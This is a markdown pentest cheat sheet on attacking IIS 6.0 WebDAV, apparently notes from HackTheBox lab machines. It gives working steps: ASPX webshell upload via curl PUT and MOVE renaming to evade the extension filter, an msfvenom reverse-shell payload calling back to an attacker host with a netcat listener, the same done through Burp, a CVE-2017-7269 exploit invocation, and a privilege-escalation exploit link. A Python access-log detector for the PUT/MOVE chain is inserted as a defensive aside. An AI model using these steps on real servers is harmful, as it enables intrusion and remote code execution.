# IIS6 WebDav

## Microsoft Windows 2003|2008|XP

* google 'iis 6.0 reverse shell'
* Microsoft-IIS/6.0
* http-webdav-scan
* WebDAV allows clients to perform Web authoring operations remotely.
* REF: [Granny/Grandpa-HTB](https://pentest.mxhx.org/04-webapps/iis6-webdav)
* [https://github.com/ohpe/juicy-potato/releases](https://github.com/ohpe/juicy-potato/releases)

## nmap finds webdav

* **nmap -sV -sC -oA nmap 10.x.x.x**
* Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
* Options: OPTIONS, TRACE, **GET**, HEAD, DELETE, **PUT**, POST, COPY, **MOVE**
* GET - download
* PUT - upload
* MOVE - you can rename/move

## davtest

```
> davtest -url http://10.x.x.x
```

## cadaver

```
> cadaver http://10.x.x.x
d> ls                          ..list
d> put shell.aspx              ..403 Forbidden
d> put shell.txt               ..ok
d> move shell.txt shell.aspx   ..ok
```

## PUT/MOVE

* Scenario:
  * Can 'put' text - upload
  * NOT 'put' aspx
  * Can 'move' aspx

```
------------------
Test:
curl -X PUT http://10.x.x.x/hello.txt -d @hello.txt
curl http://10.x.x.x/hello.txt

------------------
webshell:
cp /usr/share/webshells/aspx/cmdasp.aspx .
curl -X PUT http://10.x.x.x/payload.txt -d @cmdasp.aspx
curl -X MOVE -H 'Destination:http://10.x.x.x/payload.aspx' http://10.x.x.x/payload.txt
http://10.x.x.x/payload.aspx
Command: whoami 'execute' button
network service

------------------
reverse:
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 -f aspx > reverse.aspx
curl -X PUT http://10.x.x.x/reverse.txt --data-binary @reverse.aspx
curl -X MOVE -H 'Destination:http://10.x.x.x/reverse.aspx' http://10.x.x.x/reverse.txt
curl http://10.x.x.x/reverse.aspx
http://10.x.x.x/reverse.aspx
nc -nlvp 4444
```
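
The PUT-then-MOVE sequence above leaves a recognizable trail in the web server's access log. This log check is an added example, not part of the original notes: it parses a constructed W3C extended log (column names taken from the `#Fields` line) and flags script PUTs as well as a PUT, MOVE, then script request from the same client. `SCRIPT_EXT`, the function names and the sample lines are assumptions.

```python
import posixpath

# Extensions the server would execute (assumed list; adjust to the handler mappings in use).
SCRIPT_EXT = {".asp", ".aspx", ".asa", ".cer", ".ashx", ".asmx"}

# Constructed sample in W3C extended format (documentation IPs, not real traffic).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2024-01-01 10:00:01 192.0.2.10 OPTIONS / 200
2024-01-01 10:00:05 192.0.2.10 PUT /upload.aspx 403
2024-01-01 10:00:09 192.0.2.10 PUT /upload.txt 201
2024-01-01 10:00:12 192.0.2.10 MOVE /upload.txt 201
2024-01-01 10:00:15 192.0.2.10 GET /upload.aspx 200
2024-01-01 10:02:00 198.51.100.7 PUT /notes.txt 201
2024-01-01 10:03:00 198.51.100.7 GET /notes.txt 200
"""

def parse(log_text):
    """Yield one dict per request, taking column names from the #Fields directive."""
    fields = []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.strip() and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def find_put_move(log_text):
    """Return (kind, client_ip, uri) alerts for script PUTs and PUT -> MOVE -> script chains."""
    alerts, uploaded, moved = [], set(), set()
    for r in parse(log_text):
        ip, method = r["c-ip"], r["cs-method"].upper()
        uri = r["cs-uri-stem"].lower()
        stem, ext = posixpath.splitext(uri)
        ok = r["sc-status"].startswith("2")
        if method == "PUT" and ext in SCRIPT_EXT:
            alerts.append(("script-put-allowed" if ok else "script-put-denied", ip, uri))
        elif method == "PUT" and ok:
            uploaded.add((ip, uri))
        elif method == "MOVE" and ok and (ip, uri) in uploaded:
            # The log has no Destination column, so remember the base name only.
            moved.add((ip, stem))
        elif ext in SCRIPT_EXT and ok and (ip, stem) in moved:
            alerts.append(("put-move-exec", ip, uri))
    return alerts

if __name__ == "__main__":
    for alert in find_put_move(SAMPLE_LOG):
        print(*alert)
```

The chain is correlated by base name because the constructed log carries no Destination column; a rename to a different base name needs that header or file-system auditing to be caught.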

## Burp

```
Proxy 10.x.x.x: 80
Burp > Intercept
PUT  > Send to repeater
PUT /ippsec.html HTTP/1.1
this is a test
http://10.x.x.x/ippsec.html  .. works!

msfvenom -p windows/shell_reverse_tcp LHOST=10.x.x.x LPORT=4444 -f aspx
copy/paste the text of aspx msfvenom
paste into burp (bottom)
PUT /ippsec.html HTTP/1.1    ..html ok
PUT /ippsec.aspx HTTP/1.1    ..aspx forbidden!

OPTIONS / HTTP/1.1           ..shows list of webdav options
MOVE /ippsec.html HTTP/1.1   ..move html
Destination: /ippsec.aspx    ..aspx!
http://10.x.x.x/ippsec.aspx
nc -nvlp 4444
Connected!
```

## iis6-exploit

* CVE-2017-7269
* iis_shell.py
* iis6-exploit-2017-CVE-2017-**7269**
* <https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269>
* usage: iis6webdav.py RHOST RPORT LHOST LPORT

```
> nc -nvlp 4444
> python ./iis6webdav.py 10.x.x.tgt 80 10.x.x.me 4444
```

## Windows 2003

Windows Server 2003 and IIS 6.0 privilege escalation using impersonation:\
<https://www.exploit-db.com/exploits/6705/>
